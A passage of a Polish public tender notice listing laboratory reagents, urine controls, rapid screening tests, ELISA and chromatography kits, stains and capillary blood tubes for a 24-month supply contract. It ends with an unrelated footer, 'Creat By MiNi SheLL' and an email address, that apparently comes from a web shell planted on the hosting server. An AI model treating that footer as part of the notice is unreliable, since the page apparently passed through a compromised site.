1.2 LDL - met. bezpośrednia, liniowość min. 400 mg/dl, kontrola, kalibrator, 1 kontr./tydzień - 5000 oznaczeń<br>
1.3 RF - met. ilościowa, liniowość do min. 500 IU/ml, kontrola min.2 poziomy ( materiał ciekły; stabilny po otwarciu co najmniej 60 dni), kalibrator min.4 poziomy, 1 kontr./tydzień - 3200 oznaczeń<br>
1.4 Cystatyna C, liniowość min. do 8 mg/l, z kalibratorami i kontrolą, 1 kontr./tydzień
- 1000 oznaczeń<br>
1.5 Wolny cholesterol - met. enzymatyczna z 4-aminoantypiryną, liniowość min. do 400 mg/dl, kontrola, kalibrator, 1 kontr./tydzień - 200 oznaczeń<br>
2. Materiały do kontroli moczu: kontrola właściwości fizykochemicznych i mikroskopowych moczu, materiał liofilizowany<br>
2.1 Mocz kontrolny patologiczny (wartości podwyższone), liofilizowany, 2 kontr./tydzień - 480 ml moczu kontrolnego<br>
2.2 Mocz kontrolny normalny (wartości w granicach normy), liofilizowany, 2 kontr./tydzień - 720 ml moczu kontrolnego<br>
3. Testy screeningowe<br>
3.1 Helicobacter Pylori Ag w kale, indywidualnie pakowane kasetki,  kompletne zestawy do pobierania i rozcieńczania próbek, brak efektu prozonowego, do stężenia białka H.pylorii wynoszącego 2,5mg/ml - 1600 oznaczeń<br>
3.2 FOB - test kasetkowy, bez konieczności stosowania specjalnej diety, czułość min. 40 ng/ml, brak efektu prozonowego do 0,5mg/ml, czułość większa lub równa 95%, swoistość większa lub równa 99% - 2000 oznaczeń<br>
3.3 SLE latex - 700 oznaczeń<br>
3.4 Mononukleoza - indywidualnie pakowane kasetki, czułość większa lub równa 99,9%, swoistość większa lub równa 98% - 600 oznaczeń<br>
3.5 Syphilis testy kasetkowe, met. 5 min. , kasetki pakowane indywidualnie - 240 oznaczeń<br>
3.6 Giardia Lamblia w kale, test kasetkowy, kasetki pakowane indywidualnie, czułość   większa lub równa 99%;  swoistość  większa lub równa 98% - 600 oznaczeń<br>
3.7 Test Waalera-Rose - 400 oznaczeń<br>
4. Testy met. ELISA<br>
4.1 Giardia Lamblia w kale, test 2-giej generacji, z użyciem przeciwciał monoklonalnych, limit detekcji 5 ng antygenu Giardia L./ml, pełny zestaw z kontrolami, max. 2 etapy płukania, brak reakcji krzyzowych z Ascaris lumbr., Rotavirus, Adenovirus - 2000 oznaczeń<br>
4.2 Progesteron 17-OH, z kalibratorami, kontrolą, ilościowy - 900 oznaczeń<br>

UWAGA:<br>
Podane ilości oznaczeń nie uwzględniają ilości kalibratorów i kontroli.<br>
Wykonawca na podstawie szacunkowej ilości oznaczeń zobowiązany jest określić niezbędną ilość pozycji do ich wykonywania takich jak:<br>
-materiały kalibracyjne<br>
-materiały kontrolne<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa odczynników do oznaczeń met. chromatografii mikrokolumnowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynniki do oznaczeń met. chromatografii mikrokolumnowej<br>
1.1 17-Ketosteroidy, metoda chromatograficzno-spektrofotometryczna, zimmerman. Kompletny zestaw ze standardem. Opakowanie max. 40 ozn. - 480 oznaczeń<br>
1.2 17-Hydroksykortykosteroidy, metoda chromatograficzno-spektrofotometryczna, porter-silber. Kompletny zestaw ze standardem. Opakowanie max. 40 ozn. - 480 oznaczeń<br>
1.3 Kwas wanilino-migdałowy, metoda chromatograficzno-spektrofotometryczna. Kompletny zestaw ze standardem. Opakowanie max. 20 ozn. - 480 oznaczeń<br>
1.4 Mocz kontrolny do zestawów z poz. 1.1, 1.2, 1.3. - 400 ml<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - odczynników do analizatora Vidas PC..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynniki do analizatora Vidas PC<br>
1.1 anty-Borrelia burgdorferi sl IgM, w surowicy - 1600 oznaczeń<br>
1.2 anty-Borrelia burgdorferi sl IgG, w surowicy i PMR - 1600 oznaczeń <br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - dostawa barwników i odczynników do analityki ogólnej i hematologii..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Barwniki i odczynniki do analityki og. i hematologii <br>
1.1 Roztwór Giemsy: charakterystyka spektr.: zakres absorb. dla lambda 1: 522-528nm, dla lambda 2: 649-654nm.; absorb. dla lambda 1>0,680nm, dla  lambda 2>1,250nm - 30000 ml<br>
1.2 Barwnik May-Grunwalda  charakterystyka spektr.: zakres absorb. dla lambda 1: 522-528nm, dla lambda 2: 652-656nm.; absorb. dla lambda 1>0,540nm, dla  lambda 2>1,080nm - 50000 ml<br>
1.3 Barwnik do retykulocytów (roztwór) - 2000 ml<br>
1.4 Odczynnik rozcieńczający barwnik Giemsy stężony (20x) - 10000 ml <br>
1.5 Odczynnik Samsona, op. max. 100ml - 600 ml <br>
1.6 Odczynnik Rosina, op. max. 100ml - 600 ml <br>
1.7 Odczynnik Nonne-Apelta max. 100ml - 600 ml <br>
1.8 Odczynnik Lugola 100 ml - 600 ml<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - dostawa zestawów do immunofiksacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw do immunofiksacji zawierający żele i niezbędne odczynniki oraz antysurowice (IgA, IgG, IgM oraz łańcuchy lekkie lambda i kappa ) do metod immunofiksacji  kompatybilne z komorą K20, aplikatorem i matrycą do nanoszenia anysurowic firmy Sebia. Zestawy pojedyncze - 600 oznaczeń<br>

UWAGA:<br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - dostawa probówek do pobierania krwi włośniczkowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Probówki do pobierania krwi włośniczkowej<br>
1.1. Probówki do glukozy z przywieszanym korkiem, ok.300 ul z kapilarą (k.włośn.) - 50000 szt. <br>
1.2. Probówki ( surowica ) z przywieszanym korkiem, 200 - 300 ul z kapilarą (k.włośn.) - 60 000 szt. <br>
1.3. Probówki ( surowica ), z przywieszanym korkiem, 400 - 500 ul z kapilarą (k.włośn.) - 20 000 szt.<br>
1.4. Probówki z EDTA K2/K3, z przywieszanym korkiem, 200 - 300 ul z kapilarą (k.włośniczkowa) - 70 000 szt.<br>
1.5. Probówki do liczenia retikulocytów (krew żylna lub włośniczkowa) - 4 000 szt.<br>
1.6. Probówki do liczenia płytek krwi (krew żylna lub włośniczkowa) - 1000 szt. <br>

UWAGA: <br>
Zamawiający dopuszcza możliwość przeliczenia ceny wg oferowanych przez Wykonawcę opakowań pod warunkiem zachowania zamawianej ilości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com